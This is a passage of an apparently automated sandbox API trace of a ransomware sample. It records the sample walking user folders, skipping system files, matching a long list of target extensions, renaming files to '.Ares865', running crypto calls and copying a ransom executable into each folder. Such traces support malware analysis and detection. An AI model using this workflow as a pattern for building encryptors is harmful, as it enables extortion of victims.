(lpString="daschema") returned 8 [0092.802] lstrcmpiW (lpString1="earch-ms", lpString2="daschema") returned 1 [0092.802] lstrlenW (lpString="db-journal") returned 10 [0092.802] lstrcmpiW (lpString1=".search-ms", lpString2="db-journal") returned -1 [0092.802] lstrlenW (lpString="db-shm") returned 6 [0092.802] lstrcmpiW (lpString1="rch-ms", lpString2="db-shm") returned 1 [0092.802] lstrlenW (lpString="db-wal") returned 6 [0092.802] lstrcmpiW (lpString1="rch-ms", lpString2="db-wal") returned 1 [0092.802] lstrlenW (lpString="dbc") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0092.802] lstrlenW (lpString="dbs") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0092.802] lstrlenW (lpString="dbt") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0092.802] lstrlenW (lpString="dbv") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0092.802] lstrlenW (lpString="dbx") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0092.802] lstrlenW (lpString="dcb") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0092.803] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.Ares865") returned 67 [0092.803] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.ares865"), dwFlags=0x1) returned 1 [0092.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.803] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248) returned 1 [0092.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.804] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.805] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x15c [0092.807] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0092.808] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.808] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.808] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.809] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.809] CloseHandle (hObject=0x15c) returned 1 [0092.809] CloseHandle (hObject=0x118) returned 1 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.810] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d111ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.810] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.810] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="aoldtz.exe") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootmgr") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="temp") returned -1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="pagefile.sys") returned -1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ids.txt") returned 1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="perflogs") returned -1 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="MSBuild") returned -1 [0092.810] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0092.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 59 [0092.810] lstrcpyW (in: lpString1=0x2cce44e, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0092.810] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0092.810] lstrlenW (lpString="Ares865") returned 7 [0092.810] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0092.810] lstrlenW (lpString=".dll") returned 4 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".dll") returned 1 [0092.810] lstrlenW (lpString=".lnk") returned 4 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".lnk") returned 1 [0092.810] lstrlenW (lpString=".ini") returned 4 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".ini") returned 1 [0092.810] lstrlenW (lpString=".sys") returned 4 [0092.810] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".sys") returned 1 [0092.810] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0092.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.Ares865") returned 74 [0092.811] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.ares865"), dwFlags=0x1) returned 1 [0092.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.811] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248) returned 1 [0092.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.812] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.813] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.813] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.813] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x15c [0092.817] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0092.818] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.818] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.818] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.819] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.819] CloseHandle (hObject=0x15c) returned 1 [0092.819] CloseHandle (hObject=0x118) returned 1 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.819] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.819] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0092.819] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.820] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0092.820] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0092.820] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0092.820] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0092.820] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 41 [0092.820] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0092.820] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.820] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.820] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.821] GetLastError () returned 0x0 [0092.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.821] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.821] CloseHandle (hObject=0x120) returned 1 [0092.821] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.821] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d138020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.821] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.821] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.821] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.821] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d138020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.821] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.821] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.821] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.821] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.821] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.821] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.822] lstrlenW (lpString="desktop.ini") returned 11 [0092.822] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 43 [0092.822] lstrcpyW (in: lpString1=0x2cce454, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.822] lstrlenW (lpString="desktop.ini") returned 11 [0092.822] lstrlenW (lpString="Ares865") returned 7 [0092.822] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.822] lstrlenW (lpString=".dll") returned 4 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.822] lstrlenW (lpString=".lnk") returned 4 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.822] lstrlenW (lpString=".ini") returned 4 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.822] lstrlenW (lpString=".sys") returned 4 [0092.822] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.822] lstrlenW (lpString="desktop.ini") returned 11 [0092.822] lstrlenW (lpString="bak") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.822] lstrlenW (lpString="ba_") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.822] lstrlenW (lpString="dbb") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.822] lstrlenW (lpString="vmdk") returned 4 [0092.822] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.822] lstrlenW (lpString="rar") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.822] lstrlenW (lpString="zip") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.822] lstrlenW (lpString="tgz") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.822] lstrlenW (lpString="vbox") returned 4 [0092.822] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.822] lstrlenW (lpString="vdi") returned 3 [0092.822] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.823] lstrlenW (lpString="vhd") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.823] lstrlenW (lpString="vhdx") returned 4 [0092.823] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.823] lstrlenW (lpString="avhd") returned 4 [0092.823] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.823] lstrlenW (lpString="db") returned 2 [0092.823] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.823] lstrlenW (lpString="db2") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.823] lstrlenW (lpString="db3") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.823] lstrlenW (lpString="dbf") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.823] lstrlenW (lpString="mdf") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.823] lstrlenW (lpString="mdb") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.823] lstrlenW (lpString="sql") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.823] lstrlenW (lpString="sqlite") returned 6 [0092.823] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.823] lstrlenW (lpString="sqlite3") returned 7 [0092.823] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.823] lstrlenW (lpString="sqlitedb") returned 8 [0092.823] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.823] lstrlenW (lpString="xml") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.823] lstrlenW (lpString="$er") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.823] lstrlenW (lpString="4dd") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.823] lstrlenW (lpString="4dl") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.823] lstrlenW (lpString="^^^") returned 3 [0092.823] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.824] lstrlenW (lpString="abs") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.824] lstrlenW (lpString="abx") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.824] lstrlenW (lpString="accdb") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.824] lstrlenW (lpString="accdc") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.824] lstrlenW (lpString="accde") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.824] lstrlenW (lpString="accdr") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.824] lstrlenW (lpString="accdt") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.824] lstrlenW (lpString="accdw") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.824] lstrlenW (lpString="accft") returned 5 [0092.824] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.824] lstrlenW (lpString="adb") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.824] lstrlenW (lpString="adb") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.824] lstrlenW (lpString="ade") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.824] lstrlenW (lpString="adf") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.824] lstrlenW (lpString="adn") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.824] lstrlenW (lpString="adp") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.824] lstrlenW (lpString="alf") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.824] lstrlenW (lpString="ask") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.824] lstrlenW (lpString="btr") returned 3 [0092.824] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.825] lstrlenW (lpString="cat") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.825] lstrlenW (lpString="cdb") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.825] lstrlenW (lpString="ckp") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.825] lstrlenW (lpString="cma") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.825] lstrlenW (lpString="cpd") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.825] lstrlenW (lpString="dacpac") returned 6 [0092.825] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.825] lstrlenW (lpString="dad") returned 3 [0092.825] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.825] lstrlenW (lpString="dadiagrams") returned 10 [0092.825] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.825] lstrlenW (lpString="daschema") returned 8 [0092.825] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.825] lstrlenW (lpString="db-journal") returned 10 